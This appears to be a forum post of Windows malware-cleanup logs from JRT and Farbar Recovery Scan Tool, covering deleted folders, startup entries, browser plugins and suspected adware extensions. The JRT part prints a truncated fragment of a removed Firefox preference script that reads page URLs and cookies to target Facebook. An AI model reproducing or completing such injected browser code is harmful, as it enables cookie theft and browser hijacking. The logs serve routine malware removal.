Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E17701DC-3970-4986-AA60-9CE797894ED9}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E1E6CAA3-DA98-4A18-8583-3C9CC288FE68}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E270E15E-76AF-4C16-BF68-30724436F71F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E3AAA6F0-27DC-4DD9-A79F-E1A1C37B5B91}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E3B74464-52F6-4F8D-8C10-693FEA2D0A10}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E43F5C79-5EF2-4B2F-80B0-3CCF06593F76}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E48777E9-3A2E-4D2E-A43B-40AFCB2B707B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E5195A80-321C-4241-8C4E-A621338585D2}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E51B53C0-9CD8-4E53-B719-1B2F4E250F62}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E7767EE4-77ED-4AAB-BBAE-FE3DF89BA37B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E7BD7FA2-7AEE-4DEB-BCE7-B9976C540B6D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E92FE778-8024-49B6-92DC-E7C954AB822A}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{E94AA2B6-884F-44BC-9467-5258393620C9}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EA070182-7D2D-4709-B581-C1B69BB90FBA}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EA1727A0-7E81-48B9-8BBC-C2496E124033}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EA458892-5480-49F8-BD3B-B3E3ECDA98DB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EA729868-B7BC-43DD-8D7B-1048B6F9D17A}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EB1C1E96-D3BD-4319-B05F-F99E19A0D01B}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{ECE2A68F-EB02-4461-B221-B2162AF4E706}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{ED9BC4AA-0E0B-49E3-9E0E-91FE95F42DAD}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EE2CE25F-44AD-4E23-9303-55EDA42A07D5}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EE508342-446A-4EC0-9002-BDFAFE76B8FF}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{EF1C99F9-B7EB-480D-947D-335795F0DF79}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F0346396-2B59-41DD-BCAB-0C65F2A95D08}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F04F83F4-F65E-4F20-A262-ED041B7D91EB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F105B5AE-8E81-45C6-A3EB-10F31ACF2BF8}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F1147126-68B9-4D5E-B1B2-666740C96257}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F2721FA7-3559-4ED7-BF54-CCC2E9FF427F}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F30EDD03-E5FF-4760-BB4C-3DB3A46537FB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F38061E9-4323-4854-B0F1-D5527DE1E814}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F45E9F89-B5AC-4282-B8BD-B83556B7D7C3}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F5B7BA5A-69C0-4BB2-B139-0E0A07596F02}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F5F9FAD8-B7A2-42D3-B4B0-B762DECE3630}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F6097997-4D05-448A-A370-F7BDA971CA91}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F6CADC97-0C61-4508-BED4-250515C62DDF}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F6E0E424-C61F-4F59-83FB-45DCF3D7314C}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F877F729-164A-4F5D-B708-2D2A3AA40879}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F9034330-E036-4398-B9E8-9FA74FB2D8BB}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F9236E97-1A61-4BE0-9C58-E4FC9268202D}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F98CFC50-0772-45E6-8398-612CB554B36A}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{F99DA632-6E0D-49A4-9230-3687A15BF5D7}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{FBB26DB4-CF44-448B-AD86-4F419C516D43}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{FDC4DBAF-DEF2-4CE8-B72A-6530E74A67C5}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{FE14900D-8C23-4CA7-8185-A13EC4AA7A85}
Successfully deleted: [Empty Folder] C:\Users\BR\appdata\local\{FF503591-4AE5-4F9E-A3BA-C7FB5F8C59C5}



~~~ FireFox

Successfully deleted the following from C:\Users\BR\AppData\Roaming\mozilla\firefox\profiles\acm539rf.default\prefs.js

user_pref("extensions.VRP76tdH9kf0F4HH.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnale
Emptied folder: C:\Users\BR\AppData\Roaming\mozilla\firefox\profiles\acm539rf.default\minidumps [35 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 31/12/2014 at 10:53:50.40
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#4 FRST & Addition logs

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 28-12-2014
Ran by BR (administrator) on BRIAN-PC on 31-12-2014 11:09:43
Running from C:\Users\BR\Downloads
Loaded Profile: BR (Available profiles: BRIAN & bcom & BR)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\hp\Common\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Western Digital Technologies, Inc.) C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Western Digital Technologies, Inc.) C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Nico Mak Computing) C:\Program Files\File Association Helper\FAHWindow.exe
(Akamai Technologies, Inc.) C:\Users\BR\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP Officejet Pro 8620\Bin\ScanToPCActivationApp.exe
() C:\Program Files (x86)\HitsBlender\hitsblender.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP Officejet Pro 8620\Bin\HPNetworkCommunicatorCom.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Akamai Technologies, Inc.) C:\Users\BR\AppData\Local\Akamai\netsession_win.exe
(Western Digital Technologies, Inc.) C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
(Western Digital Technologies, Inc.) C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
(Western Digital Technologies, Inc.) C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Farbar) C:\Users\BR\Downloads\FRST64(3).exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_206.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_206.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [LogMeIn GUI] => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [XeroxEndeavorBackgroundTask] => rundll32.exe xrWCbgnd.dll,LaunchBgTask 1
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [557768 2014-09-19] (Adobe Systems Incorporated)
HKLM\...\Run: [FAHConsole] => C:\Program Files\File Association Helper\FAHConsole.exe [729272 2014-01-28] (Nico Mak Computing)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694320 2014-10-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WD Drive Unlocker] => C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe [1694080 2013-06-18] (Western Digital Technologies, Inc.)
HKLM-x32\...\Run: [DriveUtilitiesHelper] => C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe [1852264 2014-05-23] (Western Digital Technologies, Inc.)
HKLM-x32\...\Run: [WD Quick View] => C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe [5562736 2014-07-22] (Western Digital Technologies, Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2087776 2014-08-26] (Wondershare)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [aliim] => C:\Program Files (x86)\TradeManager\AliIM.exe [293688 2014-10-13] (Alibaba (China) Co., Ltd.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [Akamai NetSession Interface] => C:\Users\BR\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-29] (Akamai Technologies, Inc.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2014-10-20] (Apple Inc.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22065760 2014-10-01] (Skype Technologies S.A.)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [HP Officejet Pro 8620 (NET)] => C:\Program Files\HP\HP Officejet Pro 8620\Bin\ScanToPCActivationApp.exe [3487240 2014-07-21] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Run: [HitsBlender] => C:\Program Files (x86)\HitsBlender\hitsblender.exe [678968 2014-12-24] ()
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll ()
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll (Autodesk, Inc.)
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-998330651-303224156-1059126384-1004\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft...d=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft...=ie&ar=iesearch
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft....google.com&OSP=
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft....google.com&OSP=
HKU\S-1-5-21-998330651-303224156-1059126384-1004\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft...=ie&ar=iesearch
HKU\S-1-5-21-998330651-303224156-1059126384-1004\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM -> {07C7C110-7846-4522-8DA7-7316F05F3171} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll (Hewlett-Packard Co.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.)
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds...ransferCtrl.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 64.59.144.16 64.59.150.132
Tcpip\..\Interfaces\{975E2597-4892-450D-9E49-5CA092C4B97F}: [NameServer] 208.69.150.250,208.69.150.252
Tcpip\..\Interfaces\{A8A07555-0EF1-4315-8F87-711544AA5BDA}: [NameServer] 208.69.150.250,208.69.150.252
Tcpip\..\Interfaces\{BC556D6E-E0DC-496A-82C9-E12641CD952E}: [NameServer] 208.69.150.250,208.69.150.252

FireFox:
========
FF ProfilePath: C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default
FF DefaultSearchUrl:
FF SearchEngineOrder.1:
FF SearchEngineOrder.3: Bing
FF Homepage: https://www.google.com/?gws_rd=ssl
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_206.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll ()
FF Plugin-x32: @alibaba.com/nptrademanager;version=1.0 -> C:\Program Files (x86)\TradeManager\nptrademanager.dll ( )
FF Plugin-x32: @alibaba.com/npwangwang;version=1.0 -> C:\Program Files (x86)\TradeManager\npwangwang.dll ( )
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll No File
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @logitech.com/HarmonyRemote,version=1.0.0 -> C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @oberon-media.com/ONCAdapter -> C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.14\npapicomadapter.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKU\S-1-5-21-998330651-303224156-1059126384-1004: @alibaba.com/npAliSSOLogin;version=1.0 -> C:\Program Files (x86)\TradeManager\npAliSSOLogin.dll (Alibaba software (Shanghai) Corporation.)
FF Plugin HKU\S-1-5-21-998330651-303224156-1059126384-1004: @alibaba.com/nptrademanager;version=1.0 -> "C:\Program Files (x86)\TradeManager\nptrademanager.dll" No File
FF Plugin HKU\S-1-5-21-998330651-303224156-1059126384-1004: @alibaba.com/npwangwang;version=1.0 -> "C:\Program Files (x86)\TradeManager\npwangwang.dll" No File
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nptrademanager.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwangwang.dll ( )
FF Extension: 20-20 3D Viewer - IKEA - C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\Extensions\[email protected] [2013-09-19]
FF Extension: TinyWallet - C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\Extensions\[email protected] [2014-12-24]
FF Extension: iCloud Bookmarks - C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\Extensions\[email protected] [2014-11-20]
FF Extension: HP Detect - C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\Extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2} [2013-09-29]
FF Extension: عارض PDF - C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\Extensions\[email protected] [2013-08-16]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2012-03-13]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-09-05]
CHR Extension: (Google Docs) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-27]
CHR Extension: (Google Drive) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-27]
CHR Extension: (YouTube) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-10-27]
CHR Extension: (Google Search) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-10-27]
CHR Extension: (Google Sheets) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-09-05]
CHR Extension: (No Name) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana [2014-12-24]
CHR Extension: (Google Wallet) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-27]
CHR Extension: (MyHarmony Chrome Plugin) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\omaonpoimgkmbllpdihbnmgphjoipdhf [2014-09-05]
CHR Extension: (Gmail) - C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-10-27]
CHR HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Chrome\Extension: [blklojfklgnogjaijkibhfjepakiocng] - C:\Users\BR\AppData\Local\CRE\blklojfklgnogjaijkibhfjepakiocng.crx [Not Found]
CHR HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Chrome\Extension: [oiffmnkajgkhjjchngmajlomfdhfjdma] - C:\Users\BR\AppData\Local\CRE\oiffmnkajgkhjjchngmajlomfdhfjdma.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [blklojfklgnogjaijkibhfjepakiocng] - C:\Users\BR\AppData\Local\CRE\blklojfklgnogjaijkibhfjepakiocng.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [cielokkdbnmofbmnbpcejffmiphehkfh] - C:\ProgramData\ADDICT-THING\cielokkdbnmofbmnbpcejffmiphehkfh.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [nbpjhhdlpbeomimlbihkcknjdkcnmhfk] - C:\ProgramData\ADDICT-THING\nbpjhhdlpbeomimlbihkcknjdkcnmhfk.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [oiffmnkajgkhjjchngmajlomfdhfjdma] - C:\Users\BR\AppData\Local\CRE\oiffmnkajgkhjjchngmajlomfdhfjdma.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [omaonpoimgkmbllpdihbnmgphjoipdhf] - C:\Program Files (x86)\Logitech\Harmony Remote Driver\harmony_chrome.crx [2012-12-27]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor12.0; C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe [181152 2013-09-25] (Adobe Systems Incorporated)
